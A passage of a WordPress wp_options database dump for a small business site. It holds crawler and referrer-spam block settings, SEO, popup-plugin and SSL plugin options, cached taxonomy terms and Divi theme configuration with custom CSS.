Ninja\\nEasouSpider\\nEmailCollector\\nEmailSiphon\\nEmailWolf\\nEroCrawler\\nExtractorPro\\nFasterfox\\nFeedBooster\\nFoobot\\nGenieo\\ngrub-client\\nHarvest\\nhloader\\nhttplib\\nHTTrack\\nhumanlinks\\nieautodiscovery\\nInfoNaviRobot\\nIstellaBot\\nJava\\/1.\\nJennyBot\\nk2spider\\nKenjin Spider\\nKeyword Density\\/0.9\\nlarbin\\nLexiBot\\nlibWeb\\nlibwww\\nLinkextractorPro\\nlinko\\nLinkScan\\/8.1a Unix\\nLinkWalker\\nLNSpiderguy\\nlwp-trivial\\nmagpie\\nMata Hari\\nMaxPointCrawler\\nMegaIndex\\nMicrosoft URL Control\\nMIIxpc\\nMippin\\nMissigua Locator\\nMister PiX\\nMJ12bot\\nmoget\\nMSIECrawler\\nNetAnts\\nNICErsPRO\\nNiki-Bot\\nNPBot\\nNutch\\nOffline Explorer\\nOpenfind\\npanscient.com\\nPHP\\/5.{\\nProPowerBot\\/2.14\\nProWebWalker\\nPython-urllib\\nQueryN Metasearch\\nRepoMonkey\\nSISTRIX\\nsitecheck.Internetseer.com\\nSiteSnagger\\nSnapPreviewBot\\nSogou\\nSpankBot\\nspanner\\nspbot\\nSpinn3r\\nsuzuran\\nSzukacz\\/1.4\\nTeleport\\nTelesoft\\nThe Intraformant\\nTheNomad\\nTightTwatBot\\nTitan\\ntoCrawl\\/UrlDispatcher\\nTrue_Robot\\nturingos\\nTurnitinBot\\nUbiCrawler\\nUnisterBot\\nURLy Warning\\nVCI\\nWBSearchBot\\nWeb Downloader\\/6.9\\nWeb Image Collector\\nWebAuto\\nWebBandit\\nWebCopier\\nWebEnhancer\\nWebmasterWorldForumBot\\nWebReaper\\nWebSauger\\nWebsite Quester\\nWebster Pro\\nWebStripper\\nWebZip\\nWotbox\\nwsr-agent\\nWWW-Collector-E\\nXenu\\nZao\\nZeus\\nZyBORG\\ncoccoc\\nIncutio\\nlmspider\\nmemoryBot\\nserf\\nUnknown\\nuptime files\",\"referer\":\"semalt.com\\nkambasoft.com\\nsavetubevideo.com\\nbuttons-for-website.com\\nsharebutton.net\\nsoundfrost.org\\nsrecorder.com\\nsoftomix.com\\nsoftomix.net\\nmyprintscreen.com\\njoinandplay.me\\nfbfreegifts.com\\nopenmediasoft.com\\nzazagames.org\\nextener.org\\nopenfrost.com\\nopenfrost.net\\ngooglsucks.com\\nbest-seo-offer.com\\nbuttons-for-your-website.com\\nwww.Get-Free-Traffic-Now.com\\nbest-seo-solution.com\\nbuy-cheap-online.info\\nsite3.free-share-buttons.com\\nwebmaster-traffic.com\"}}}}}','yes'),(486,'rsssl_remaining_tasks','1','yes'),(549,'rsssl_secure_cookies_set_dismissed','1','yes'),(502,'rsssl_activation_timestamp','1622033211','yes'),(520,'rsssl_google_analytics_dismissed','1','yes'),(499,'rsssl_current_version','4.0.15','yes'),(601,'et_pb_contact_form_cdd6b189eaf6d358143d6d8e0784f0ec','off','yes'),(67324,'aioseo_options_dynamic_network_localized','a:18:{s:42:\"searchAppearance_taxonomies_category_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:52:\"searchAppearance_taxonomies_category_metaDescription\";s:21:\"#taxonomy_description\";s:42:\"searchAppearance_taxonomies_post_tag_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:52:\"searchAppearance_taxonomies_post_tag_metaDescription\";s:21:\"#taxonomy_description\";s:49:\"searchAppearance_taxonomies_layout_category_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:59:\"searchAppearance_taxonomies_layout_category_metaDescription\";s:21:\"#taxonomy_description\";s:45:\"searchAppearance_taxonomies_layout_pack_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:55:\"searchAppearance_taxonomies_layout_pack_metaDescription\";s:21:\"#taxonomy_description\";s:45:\"searchAppearance_taxonomies_layout_type_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:55:\"searchAppearance_taxonomies_layout_type_metaDescription\";s:21:\"#taxonomy_description\";s:39:\"searchAppearance_taxonomies_scope_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:49:\"searchAppearance_taxonomies_scope_metaDescription\";s:21:\"#taxonomy_description\";s:46:\"searchAppearance_taxonomies_module_width_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:56:\"searchAppearance_taxonomies_module_width_metaDescription\";s:21:\"#taxonomy_description\";s:50:\"searchAppearance_taxonomies_project_category_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:60:\"searchAppearance_taxonomies_project_category_metaDescription\";s:21:\"#taxonomy_description\";s:45:\"searchAppearance_taxonomies_project_tag_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:55:\"searchAppearance_taxonomies_project_tag_metaDescription\";s:21:\"#taxonomy_description\";}','yes'),(3458,'sgpb-dont-delete-data','1','yes'),(3459,'sgpbUnsubscribeColumnFixed','1','yes'),(3460,'SGPBUsageDays','0','yes'),(3461,'SGPBInstallDate','1630403117','yes'),(3462,'SGPBOpenNextTime','1632995117','yes'),(3463,'SGPBMaxOpenCount','80','yes'),(3464,'sgpbPopupBuilderRegisteredPlugins','{\"popup-builder\\/popup-builder.php\":{\"classPath\":\"popup-builder\\/com\\/classes\\/extension\\/SgpbPopupExtension.php\",\"className\":\"SgpbPopupExtension\",\"options\":[]}}','yes'),(3465,'SGPB_INACTIVE_EXTENSIONS','inactive','yes'),(214209,'_transient_timeout_sgpbGetPostsAllCategories','1787643578','off'),(214210,'_transient_sgpbGetPostsAllCategories','a:20:{i:0;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:6;s:4:\"name\";s:10:\"#Backpacks\";s:4:\"slug\";s:9:\"backpacks\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:6;s:8:\"taxonomy\";s:8:\"post_tag\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:1;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:7;s:4:\"name\";s:7:\"#Canada\";s:4:\"slug\";s:6:\"canada\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:7;s:8:\"taxonomy\";s:8:\"post_tag\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:2;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:8;s:4:\"name\";s:9:\"#Covid-19\";s:4:\"slug\";s:8:\"covid-19\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:8;s:8:\"taxonomy\";s:8:\"post_tag\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:3;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:9;s:4:\"name\";s:5:\"#Road\";s:4:\"slug\";s:4:\"road\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:9;s:8:\"taxonomy\";s:8:\"post_tag\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:4;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:10;s:4:\"name\";s:7:\"#Travel\";s:4:\"slug\";s:6:\"travel\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:10;s:8:\"taxonomy\";s:8:\"post_tag\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:5;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:11;s:4:\"name\";s:5:\"#Trip\";s:4:\"slug\";s:4:\"trip\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:11;s:8:\"taxonomy\";s:8:\"post_tag\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:6;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:12;s:4:\"name\";s:6:\"#Tulum\";s:4:\"slug\";s:5:\"tulum\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:12;s:8:\"taxonomy\";s:8:\"post_tag\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:7;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:3;s:4:\"name\";s:9:\"Backpacks\";s:4:\"slug\";s:9:\"backpacks\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:3;s:8:\"taxonomy\";s:8:\"category\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:8;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:19;s:4:\"name\";s:9:\"Blog Post\";s:4:\"slug\";s:9:\"blog-post\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:19;s:8:\"taxonomy\";s:29:\"monsterinsights_note_category\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:9;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:13;s:4:\"name\";s:6:\"footer\";s:4:\"slug\";s:6:\"footer\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:13;s:8:\"taxonomy\";s:8:\"nav_menu\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:2;s:6:\"filter\";s:3:\"raw\";}i:10;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:14;s:4:\"name\";s:6:\"global\";s:4:\"slug\";s:6:\"global\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:14;s:8:\"taxonomy\";s:5:\"scope\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:1;s:6:\"filter\";s:3:\"raw\";}i:11;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:17;s:4:\"name\";s:10:\"not_global\";s:4:\"slug\";s:10:\"not_global\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:17;s:8:\"taxonomy\";s:5:\"scope\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:1;s:6:\"filter\";s:3:\"raw\";}i:12;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:20;s:4:\"name\";s:9:\"Promotion\";s:4:\"slug\";s:9:\"promotion\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:20;s:8:\"taxonomy\";s:29:\"monsterinsights_note_category\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:13;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:16;s:4:\"name\";s:7:\"regular\";s:4:\"slug\";s:7:\"regular\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:16;s:8:\"taxonomy\";s:12:\"module_width\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:2;s:6:\"filter\";s:3:\"raw\";}i:14;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:4;s:4:\"name\";s:9:\"Road Trip\";s:4:\"slug\";s:9:\"road-trip\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:4;s:8:\"taxonomy\";s:8:\"category\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:15;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:15;s:4:\"name\";s:7:\"section\";s:4:\"slug\";s:7:\"section\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:15;s:8:\"taxonomy\";s:11:\"layout_type\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:2;s:6:\"filter\";s:3:\"raw\";}i:16;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:5;s:4:\"name\";s:6:\"Travel\";s:4:\"slug\";s:6:\"travel\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:5;s:8:\"taxonomy\";s:8:\"category\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:17;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:2;s:4:\"name\";s:17:\"Tripo Header Menu\";s:4:\"slug\";s:17:\"tripo-header-menu\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:2;s:8:\"taxonomy\";s:8:\"nav_menu\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:5;s:6:\"filter\";s:3:\"raw\";}i:18;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:1;s:4:\"name\";s:13:\"Uncategorized\";s:4:\"slug\";s:13:\"uncategorized\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:1;s:8:\"taxonomy\";s:8:\"category\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}i:19;O:7:\"WP_Term\":10:{s:7:\"term_id\";i:18;s:4:\"name\";s:15:\"Website Updates\";s:4:\"slug\";s:15:\"website-updates\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:18;s:8:\"taxonomy\";s:29:\"monsterinsights_note_category\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:0;s:6:\"filter\";s:3:\"raw\";}}','off'),(3473,'sgpb-all-notifications-data','[{\"priority\":1,\"type\":1,\"id\":\"sgpbMainRateUsNotification\",\"message\":\"\\t\\t<style>\\n\\t\\t\\t.sgpb-buttons-wrapper .press{\\n\\t\\t\\t\\tbox-sizing:border-box;\\n\\t\\t\\t\\tcursor:pointer;\\n\\t\\t\\t\\tdisplay:inline-block;\\n\\t\\t\\t\\tfont-size:1em;\\n\\t\\t\\t\\tmargin:0;\\n\\t\\t\\t\\tpadding:0.5em 0.75em;\\n\\t\\t\\t\\ttext-decoration:none;\\n\\t\\t\\t\\ttransition:background 0.15s linear\\n\\t\\t\\t}\\n\\t\\t\\t.sgpb-buttons-wrapper .press-grey {\\n\\t\\t\\t\\tbackground-color:#9E9E9E;\\n\\t\\t\\t\\tborder:2px solid #9E9E9E;\\n\\t\\t\\t\\tcolor: #FFF;\\n\\t\\t\\t}\\n\\t\\t\\t.sgpb-buttons-wrapper .press-lightblue {\\n\\t\\t\\t\\tbackground-color:#03A9F4;\\n\\t\\t\\t\\tborder:2px solid #03A9F4;\\n\\t\\t\\t\\tcolor: #FFF;\\n\\t\\t\\t}\\n\\t\\t\\t.sgpb-buttons-wrapper {\\n\\t\\t\\t\\ttext-align: center;\\n\\t\\t\\t}\\n\\t\\t\\t.sgpb-review-wrapper{\\n\\t\\t\\t\\ttext-align: center;\\n\\t\\t\\t\\tpadding: 20px;\\n\\t\\t\\t}\\n\\t\\t\\t.sgpb-review-wrapper p {\\n\\t\\t\\t\\tcolor: black;\\n\\t\\t\\t}\\n\\t\\t\\t.sgpb-review-h1 {\\n\\t\\t\\t\\tfont-size: 22px;\\n\\t\\t\\t\\tfont-weight: normal;\\n\\t\\t\\t\\tline-height: 1.384;\\n\\t\\t\\t}\\n\\t\\t\\t.sgrb-review-h2{\\n\\t\\t\\t\\tfont-size: 20px;\\n\\t\\t\\t\\tfont-weight: normal;\\n\\t\\t\\t}\\n\\t\\t\\t:root {\\n\\t\\t\\t\\t--main-bg-color: #1ac6ff;\\n\\t\\t\\t}\\n\\t\\t\\t.sgrb-review-strong{\\n\\t\\t\\t\\tcolor: var(--main-bg-color);\\n\\t\\t\\t}\\n\\t\\t\\t.sgrb-review-mt20{\\n\\t\\t\\t\\tmargin-top: 20px\\n\\t\\t\\t}\\n\\t\\t<\\/style>\\n\\t\\t<div class=\\\"sgpb-review-wrapper\\\">\\n\\t\\t\\t<div class=\\\"sgpb-review-description\\\">\\n\\t\\t\\t\\t<h1 class=\\\"sgpb-review-h1\\\"><strong class=\\\"sgrb-review-strong\\\">This is great!<\\/strong> We have noticed that you are using Popup Builder plugin on your site for 1817 days, we are thankful for that.<\\/h1>\\t\\t\\t\\t<h2 class=\\\"sgrb-review-h2\\\">This is really great for your website score.<\\/h2>\\n\\t\\t\\t\\t<p class=\\\"sgrb-review-mt20\\\">Have your input in the development of our plugin, and we\\u2019ll provide better conversions for your site!<br \\/> Leave your 5-star positive review and help us go further to the perfection!<\\/p>\\n\\t\\t\\t<\\/div>\\n\\t\\t\\t<div class=\\\"sgpb-buttons-wrapper\\\">\\n\\t\\t\\t\\t<button class=\\\"press press-grey sgpb-button-1 sgpb-close-promo-notification\\\" data-action=\\\"sg-already-did-review\\\">I already did<\\/button>\\n\\t\\t\\t\\t<button class=\\\"press press-lightblue sgpb-button-3 sgpb-close-promo-notification\\\" data-action=\\\"sg-you-worth-it\\\">You worth it!<\\/button>\\n\\t\\t\\t\\t<button class=\\\"press press-grey sgpb-button-2 sgpb-close-promo-notification\\\" data-action=\\\"sg-show-popup-period\\\" data-message-type=\\\"days\\\">Maybe later<\\/button><\\/div>\\n\\t\\t\\t<div>\\u00a0<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\"},{\"id\":\"sgpbMainSupportBanner\",\"priority\":1,\"type\":1,\"message\":\"<div class=\\\"sgpb-support-notification-wrapper sgpb-wrapper\\\"><h4 class=\\\"sgpb-support-notification-title\\\">Need some help?<\\/h4><h4 class=\\\"sgpb-support-notification-title\\\">Let us know what you think.<\\/h4><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/wordpress.org\\/support\\/plugin\\/popup-builder\\/reviews\\/\\\"><span class=\\\"dashicons sgpb-dashicons-heart sgpb-info-text-white\\\"><\\/span><span class=\\\"sg-info-text\\\">Rate Us<\\/span><\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/help.popup-builder.com\\\"><span class=\\\"dashicons sgpb-dashicons-megaphone sgpb-info-text-white\\\"><\\/span>Support Potal<\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/wordpress.org\\/support\\/plugin\\/popup-builder\\\"><span class=\\\"dashicons sgpb-dashicons-admin-plugins sgpb-info-text-white\\\"><\\/span>Support Forum<\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/popup-builder.com\\/\\\"><span class=\\\"dashicons sgpb-dashicons-editor-help sgpb-info-text-white\\\"><\\/span>LIVE chat<\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"mailto:support@popup-builder.com?subject=Hello\\\"><span class=\\\"dashicons sgpb-dashicons-email-alt sgpb-info-text-white\\\"><\\/span>Email<\\/a><\\/div><div class=\\\"sgpb-support-notification-dont-show\\\">Bored of this?<a class=\\\"sgpb-dont-show-again-support-notification\\\" href=\\\"javascript:void(0)\\\"> Press here <\\/a>and we will not show it again!<\\/div>\"}]','yes'),(3474,'sgpbModifiedRegisteredPluginsPaths2','1','yes'),(2834,'wp_force_deactivated_plugins','a:0:{}','off'),(8435,'db_upgraded','','on'),(180,'pagelayer_icons_set','a:1:{i:0;s:13:\"font-awesome5\";}','yes'),(184,'theme_mods_clearwork','a:6:{s:18:\"custom_css_post_id\";i:-1;s:12:\"social-links\";a:0:{}s:14:\"heading-enable\";b:1;s:21:\"frontpage-widgets-top\";b:1;s:13:\"profile-image\";s:87:\"https://verde.desidrivers.com.au/wp-content/uploads/2021/04/IMG_20200807_213425_333.jpg\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1619788187;s:4:\"data\";a:6:{s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"primary\";a:0:{}s:15:\"frontpage-top-1\";a:0:{}s:15:\"frontpage-top-2\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";}s:9:\"sidebar-2\";a:3:{i:0;s:10:\"archives-2\";i:1;s:12:\"categories-2\";i:2;s:6:\"meta-2\";}}}}','no'),(206,'polite_theme_notice_start_time','1619786487','yes'),(207,'widget_polite-featured-post','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(208,'widget_polite-author','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(209,'widget_polite-social-icons','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(210,'theme_mods_polite-blog','a:6:{s:18:\"custom_css_post_id\";i:-1;s:12:\"header_image\";s:70:\"https://verde.desidrivers.com.au/wp-content/uploads/2021/04/header.png\";s:17:\"header_image_data\";O:8:\"stdClass\":5:{s:13:\"attachment_id\";i:46;s:3:\"url\";s:70:\"https://verde.desidrivers.com.au/wp-content/uploads/2021/04/header.png\";s:13:\"thumbnail_url\";s:70:\"https://verde.desidrivers.com.au/wp-content/uploads/2021/04/header.png\";s:6:\"height\";i:450;s:5:\"width\";i:1920;}s:14:\"polite_options\";a:6:{s:24:\"polite_logo_width_option\";i:401;s:34:\"polite_enable_header_image_overlay\";b:0;s:24:\"polite_enable_top_header\";b:1;s:31:\"polite_enable_top_header_social\";b:1;s:29:\"polite_enable_top_header_menu\";b:0;s:20:\"polite_primary_color\";s:7:\"#000000\";}s:18:\"nav_menu_locations\";a:4:{s:6:\"menu-1\";i:2;s:3:\"top\";i:2;s:6:\"footer\";i:2;s:6:\"social\";i:2;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1619833438;s:4:\"data\";a:8:{s:19:\"wp_inactive_widgets\";a:2:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:3:{i:0;s:14:\"recent-posts-2\";i:1;s:10:\"archives-2\";i:2;s:12:\"categories-2\";}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}s:9:\"offcanvas\";a:0:{}s:9:\"sidebar-2\";a:3:{i:0;s:10:\"archives-2\";i:1;s:12:\"categories-2\";i:2;s:6:\"meta-2\";}}}}','no'),(216,'theme_mods_spa-lite','a:1:{s:18:\"custom_css_post_id\";i:-1;}','no'),(186,'current_theme','Divi','yes'),(187,'theme_switched','','yes'),(188,'theme_switched_via_customizer','','yes'),(189,'customize_stashed_theme_mods','a:0:{}','no'),(190,'theme_mods_twentytwenty','a:1:{s:18:\"custom_css_post_id\";i:-1;}','no'),(235,'et_pb_cache_notice','a:1:{s:5:\"5.6.0\";s:6:\"ignore\";}','yes'),(240,'et_core_version','5.6.0','yes'),(242,'et_divi','a:189:{s:39:\"static_css_custom_css_safety_check_done\";b:1;s:23:\"2_5_flush_rewrite_rules\";s:4:\"done\";s:30:\"et_flush_rewrite_rules_library\";s:5:\"5.6.0\";s:31:\"divi_previous_installed_version\";s:5:\"4.9.4\";s:29:\"divi_latest_installed_version\";s:5:\"5.6.0\";s:27:\"divi_skip_font_subset_force\";b:1;s:27:\"et_pb_clear_templates_cache\";b:1;s:23:\"builder_custom_defaults\";O:8:\"stdClass\":0:{}s:33:\"customizer_settings_migrated_flag\";b:1;s:34:\"builder_custom_defaults_unmigrated\";b:0;s:40:\"divi_email_provider_credentials_migrated\";b:1;s:29:\"custom_defaults_migrated_flag\";b:1;s:15:\"divi_1_3_images\";s:7:\"checked\";s:21:\"et_pb_layouts_updated\";b:1;s:30:\"library_removed_legacy_layouts\";b:1;s:30:\"divi_2_4_documentation_message\";s:9:\"triggered\";s:24:\"footer_widget_text_color\";s:7:\"#ffffff\";s:24:\"footer_widget_link_color\";s:7:\"#ffffff\";s:19:\"product_tour_status\";a:1:{i:1;s:3:\"off\";}s:32:\"et_fb_pref_settings_bar_location\";s:6:\"bottom\";s:28:\"et_fb_pref_builder_animation\";b:1;s:41:\"et_fb_pref_builder_display_modal_settings\";s:5:\"false\";s:39:\"et_fb_pref_builder_enable_dummy_content\";b:1;s:21:\"et_fb_pref_event_mode\";s:5:\"hover\";s:20:\"et_fb_pref_view_mode\";s:7:\"desktop\";s:32:\"et_fb_pref_hide_disabled_modules\";b:0;s:28:\"et_fb_pref_history_intervals\";i:1;s:29:\"et_fb_pref_page_creation_flow\";s:7:\"default\";s:42:\"et_fb_pref_quick_actions_always_start_with\";s:7:\"nothing\";s:44:\"et_fb_pref_quick_actions_show_recent_queries\";s:3:\"off\";s:39:\"et_fb_pref_quick_actions_recent_queries\";s:2:\"im\";s:40:\"et_fb_pref_quick_actions_recent_category\";s:6:\"insert\";s:27:\"et_fb_pref_modal_preference\";s:7:\"default\";s:30:\"et_fb_pref_modal_snap_location\";s:5:\"right\";s:21:\"et_fb_pref_modal_snap\";b:0;s:27:\"et_fb_pref_modal_fullscreen\";s:5:\"false\";s:32:\"et_fb_pref_modal_dimension_width\";i:280;s:33:\"et_fb_pref_modal_dimension_height\";i:320;s:27:\"et_fb_pref_modal_position_x\";i:50;s:27:\"et_fb_pref_modal_position_y\";i:50;s:24:\"et_fb_pref_toolbar_click\";b:0;s:26:\"et_fb_pref_toolbar_desktop\";b:0;s:23:\"et_fb_pref_toolbar_grid\";b:0;s:24:\"et_fb_pref_toolbar_hover\";b:0;s:24:\"et_fb_pref_toolbar_phone\";b:0;s:25:\"et_fb_pref_toolbar_tablet\";b:0;s:28:\"et_fb_pref_toolbar_wireframe\";b:0;s:23:\"et_fb_pref_toolbar_zoom\";b:0;s:36:\"et_fb_pref_lv_modal_dimension_height\";i:0;s:35:\"et_fb_pref_lv_modal_dimension_width\";i:0;s:30:\"et_fb_pref_lv_modal_position_x\";i:0;s:30:\"et_fb_pref_lv_modal_position_y\";i:0;s:34:\"et_fb_pref_responsive_tablet_width\";i:768;s:35:\"et_fb_pref_responsive_tablet_height\";i:0;s:33:\"et_fb_pref_responsive_phone_width\";i:400;s:34:\"et_fb_pref_responsive_phone_height\";i:0;s:35:\"et_fb_pref_responsive_minimum_width\";i:320;s:35:\"et_fb_pref_responsive_maximum_width\";i:980;s:13:\"color_schemes\";s:4:\"none\";s:22:\"all_buttons_text_color\";s:7:\"#ccd4c8\";s:12:\"header_style\";s:4:\"left\";s:12:\"vertical_nav\";b:0;s:24:\"show_header_social_icons\";b:0;s:16:\"show_search_icon\";b:0;s:12:\"phone_number\";s:0:\"\";s:15:\"hide_fixed_logo\";b:0;s:22:\"fixed_secondary_nav_bg\";s:7:\"#ccd4c8\";s:22:\"fixed_menu_link_active\";s:7:\"#ccd4c8\";s:12:\"header_email\";s:0:\"\";s:16:\"menu_link_active\";s:7:\"#000000\";s:31:\"primary_nav_dropdown_line_color\";s:7:\"#ccd4c8\";s:8:\"hide_nav\";b:0;s:23:\"secondary_nav_fullwidth\";b:0;s:16:\"secondary_nav_bg\";s:7:\"#ccd4c8\";s:25:\"secondary_nav_dropdown_bg\";s:7:\"#ccd4c8\";s:9:\"divi_logo\";s:77:\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/height-cropped.jpg\";s:14:\"divi_fixed_nav\";s:2:\"on\";s:26:\"divi_gallery_layout_enable\";s:5:\"false\";s:18:\"divi_color_palette\";s:63:\"#000000|#ffffff|#e02b20|#e09900|#edf000|#7cda24|#0c71c3|#8300e9\";s:15:\"divi_grab_image\";s:5:\"false\";s:15:\"divi_blog_style\";s:5:\"false\";s:12:\"divi_sidebar\";s:16:\"et_right_sidebar\";s:22:\"divi_shop_page_sidebar\";s:16:\"et_right_sidebar\";s:23:\"divi_show_facebook_icon\";s:2:\"on\";s:22:\"divi_show_twitter_icon\";s:5:\"false\";s:21:\"divi_show_google_icon\";s:5:\"false\";s:24:\"divi_show_instagram_icon\";s:2:\"on\";s:18:\"divi_show_rss_icon\";s:5:\"false\";s:17:\"divi_facebook_url\";s:58:\"https://www.facebook.com/Verde-Naturopathy-101042665539787\";s:16:\"divi_twitter_url\";s:1:\"#\";s:15:\"divi_google_url\";s:1:\"#\";s:18:\"divi_instagram_url\";s:44:\"https://www.instagram.com/verde_naturopathy/\";s:12:\"divi_rss_url\";s:0:\"\";s:34:\"divi_woocommerce_archive_num_posts\";i:9;s:17:\"divi_catnum_posts\";i:6;s:21:\"divi_archivenum_posts\";i:5;s:20:\"divi_searchnum_posts\";i:5;s:17:\"divi_tagnum_posts\";i:5;s:16:\"divi_date_format\";s:5:\"j M Y\";s:16:\"divi_use_excerpt\";s:5:\"false\";s:26:\"divi_responsive_shortcodes\";s:2:\"on\";s:33:\"divi_gf_enable_all_character_sets\";s:5:\"false\";s:16:\"divi_back_to_top\";s:5:\"false\";s:18:\"divi_smooth_scroll\";s:5:\"false\";s:25:\"divi_disable_translations\";s:5:\"false\";s:29:\"divi_enable_responsive_images\";s:2:\"on\";s:27:\"divi_minify_combine_scripts\";s:5:\"false\";s:26:\"divi_minify_combine_styles\";s:5:\"false\";s:15:\"divi_custom_css\";s:613:\".menu_cta a {\r\n background-color:#ffffff;\r\n border-radius:28px;\r\n border:2px solid #000000;\r\n padding: 12px!important;\r\n color: #000000!important;\r\n}\r\n\r\n.et_header_style_left #et-top-navigation {\r\n padding-top: 20px!important;\r\n}\r\n \r\n.et_header_style_left .et-fixed-header #et-top-navigation {\r\n padding-top: 6px!important;\r\n}\r\n\r\n@media only screen and (max-width: 980px) {\r\n .menu_cta {\r\n text-align:center;\r\n max-width:200px;\r\n }\r\n.menu_cta a {\r\n background-color:#ffffff;\r\n border-radius:28px;\r\n border:2px solid #000000!important;\r\n \r\n padding: 12px!important;\r\n color: #000000!important;\r\n 